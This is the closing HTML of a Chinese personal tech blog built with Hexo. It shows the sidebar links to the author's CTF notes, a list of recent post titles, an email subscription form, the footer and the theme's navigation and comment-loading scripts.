                                }});}
                                $(function (){getYiyan();$('#hitokoto').click(function(){getYiyan();})});</script></div></div></div><div class="card widget" data-type="links"><div class="card-content"><div class="menu"><h3 class="menu-label">链接</h3><ul class="menu-list"><li><a class="level is-mobile" href="https://www.wolai.com/lnk3377/tX4XuAytAbP7kFrakykAbx" target="_blank" rel="noopener"><span class="level-left"><span class="level-item">CTF做题笔记</span></span><span class="level-right"><span class="level-item tag">www.wolai.com</span></span></a></li><li><a class="level is-mobile" href="https://www.wolai.com/lnk3377/sXchgZ2ArybVqFfkTrEsZN" target="_blank" rel="noopener"><span class="level-left"><span class="level-item">打靶机记录</span></span><span class="level-right"><span class="level-item tag">www.wolai.com</span></span></a></li><li><a class="level is-mobile" href="https://www.cnblogs.com/ZIKH26" target="_blank" rel="noopener"><span class="level-left"><span class="level-item">ZIKH26-Pwn师傅</span></span><span class="level-right"><span class="level-item tag">www.cnblogs.com</span></span></a></li></ul></div></div></div><!--!--><div class="card widget"><div class="card-content"><h3 class="menu-label">最新文章</h3><article class="media"><div class="media-content"><p class="date"><time dateTime="2022-05-15T12:37:00.208Z">2022-05-15</time></p><p class="title"><a href="/2022/05/15/thisismysql/">NSSRound3---This1sMysql 复现</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2022-04-19T07:12:53.945Z">2022-04-19</time></p><p class="title"><a href="/2022/04/19/*CTF2022/">🌟CTF2022-Web部分WriteUp</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2022-03-24T06:52:40.931Z">2022-03-24</time></p><p class="title"><a href="/2022/03/24/wyy/">爬取网易云评论数据</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2022-03-14T12:30:38.336Z">2022-03-14</time></p><p class="title"><a href="/2022/03/14/burp_unser/">Burpsuite---反序列化专题</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2022-03-12T06:02:14.568Z">2022-03-12</time></p><p class="title"><a href="/2022/03/12/burp_file_upload/"> </a></p></div></article></div></div><!--!--><div class="card widget"><div class="card-content"><div class="menu"><h3 class="menu-label">归档</h3><ul class="menu-list"><li><a class="level is-mobile is-marginless" href="/archives/2022/05/"><span class="level-start"><span class="level-item">五月 2022</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile is-marginless" href="/archives/2022/04/"><span class="level-start"><span class="level-item">四月 2022</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile is-marginless" href="/archives/2022/03/"><span class="level-start"><span class="level-item">三月 2022</span></span><span class="level-end"><span class="level-item tag">9</span></span></a></li><li><a class="level is-mobile is-marginless" href="/archives/2022/02/"><span class="level-start"><span class="level-item">二月 2022</span></span><span class="level-end"><span class="level-item tag">3</span></span></a></li><li><a class="level is-mobile is-marginless" href="/archives/2022/01/"><span class="level-start"><span class="level-item">一月 2022</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><a class="level is-mobile is-marginless" href="/archives/"><span class="level-start"><span class="level-item">查看全部&gt;&gt;</span></span></a></ul></div></div></div><!--!--><div class="card widget" data-type="subscribe-email"><div class="card-content"><div class="menu"><h3 class="menu-label">订阅更新</h3><form action="https://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open(&#039;https://feedburner.google.com/fb/a/mailverify?uri=&#039;,&#039;popupwindow&#039;,&#039;scrollbars=yes,width=550,height=520&#039;);return true"><input type="hidden" value="" name="uri"><input type="hidden" name="loc" value="en_US"><div class="field has-addons"><div class="control has-icons-left is-expanded"><input class="input" name="email" type="email" placeholder="Email"><span class="icon is-small is-left"><i class="fas fa-envelope"></i></span></div><div class="control"><input class="button" type="submit" value="订阅"></div></div></form></div></div></div><!--!--><div class="column-right-shadow is-hidden-widescreen"></div></div></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/">秋秋晚</a><p class="size-small"><span>&copy; 2022 秋秋晚</span>  Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank">Icarus</a> &amp; <a href="https://github.com/removeif/hexo-theme-amazing" target="_blank">Amazing</a> <br><span><span id="statistic-times">loading...</span><script>function createTime(time) {
            var n = new Date(time);
            now.setTime(now.getTime() + 250),
                days = (now - n) / 1e3 / 60 / 60 / 24,
                dnum = Math.floor(days),
                hours = (now - n) / 1e3 / 60 / 60 - 24 * dnum,
                hnum = Math.floor(hours),
            1 == String(hnum).length && (hnum = "0" + hnum),
                minutes = (now - n) / 1e3 / 60 - 1440 * dnum - 60 * hnum,
                mnum = Math.floor(minutes),
            1 == String(mnum).length && (mnum = "0" + mnum),
                seconds = (now - n) / 1e3 - 86400 * dnum - 3600 * hnum - 60 * mnum,
                snum = Math.round(seconds),
            1 == String(snum).length && (snum = "0" + snum),
                document.getElementById("statistic-times").innerHTML = "❤️本站自 <strong>"+time.split(" ")[0].replace(/\//g,".")+"</strong> 已运行 <strong>" + dnum + "</strong> 天 <strong>" + hnum + "</strong> 小时 <strong>" + mnum + "</strong> 分 <strong>" + snum + "</strong> 秒！❤️";
        }var now = new Date();setInterval("createTime('2021/12/31 00:00:00')", 250,"");</script><br></span><div class="size-small"><span>❤️感谢 <strong><span id="busuanzi_value_site_uv">99+</span></strong> 小伙伴的 <strong><span id="busuanzi_value_site_pv">99+</span></strong> 次光临！❤️</span></div></p></div><div class="level-end"><div class="field has-addons"><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/removeif/hexo-theme-amazing"><i class="fab fa-github"></i></a></p></div></div></div></div></footer><script src="https://cdnjs.loli.net/ajax/libs/moment.js/2.22.2/moment-with-locales.min.js"></script><script src="https://cdnjs.loli.net/ajax/libs/clipboard.js/2.0.4/clipboard.min.js" async></script><script>moment.locale("zh-CN");</script><script>var IcarusThemeSettings = {
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script src="/js/column.js"></script><script src="/js/animation.js"></script><a id="back-to-top" title="回到顶端" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script src="/js/back_to_top.js" defer></script><!--!--><!--!--><!--!--><script src="https://cdnjs.loli.net/ajax/libs/lightgallery/1.6.8/js/lightgallery.min.js" defer></script><script src="https://cdnjs.loli.net/ajax/libs/justifiedGallery/3.7.0/js/jquery.justifiedGallery.min.js" defer></script><script>window.addEventListener("load", () => {
            if (typeof $.fn.lightGallery === 'function') {
                $('.article').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof $.fn.justifiedGallery === 'function') {
                if ($('.justified-gallery > p > .gallery-item').length) {
                    $('.justified-gallery > p > .gallery-item').unwrap();
                }
                $('.justified-gallery').justifiedGallery();
            }
        });</script><!--!--><!--!--><!--!--><script src="/js/main.js" defer></script><script>$.getScript('/js/comment-issue-data.js',function(){loadIssueData('9901fc9cd07fca97d9c5','676e4024a92c4843a002172e7c57dd2a9875f238','LHXHL','blog_comment',false);})</script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="想要查找什么..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script src="/js/insight.js" defer></script><script>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"想要查找什么...","untitled":"(无标题)","posts":"文章","pages":"页面","categories":"分类","tags":"标签"});
        });</script><script src="https://cdn.jsdelivr.net/npm/pjax@0.2.8/pjax.js"></script><script type="text/javascript">var pjax = new Pjax({
            elements: "a",//代表点击链接就更新
            selectors: [  //代表要更新的节点
                ".section",
                "title"
            ],
            cache: true,
            cacheBust:false
        })

        function loadBusuanzi(){
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js", function () {});
        }

        function loadMathJax() { //加载mathjax
            $.getScript("//cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.4/MathJax.js?config=TeX-MML-AM_CHTML", function () {
                MathJax.Hub.Config({ tex2jax: { inlineMath: [['$', '$'], ['\(', '\)']] } });
                var math = document.getElementsByClassName("entry-content")[0];
                MathJax.Hub.Queue(["Typeset", MathJax.Hub, math]);
            });
        };

        // 开始 PJAX 执行的函数
        document.addEventListener('pjax:send', function () {
        });
        
        // PJAX 完成之后执行的函数，可以和上面的重载放在一起
        document.addEventListener('pjax:complete', function () {
            $(".section").css({opacity:1});
            if(false){
                $.getScript('/js/comment-issue-data.js',function(){loadIssueData('9901fc9cd07fca97d9c5','676e4024a92c4843a002172e7c57dd2a9875f238','LHXHL','blog_comment',false);});
            }
            if(false){
                loadMathJax();
            }
            loadMainJs(jQuery, window.moment, window.ClipboardJS, window.IcarusThemeSettings);
            loadBackTop();
            loadBusuanzi();
            if(typeof loadBanner == 'function'){
                loadBanner();
            }
        });</script></body></html>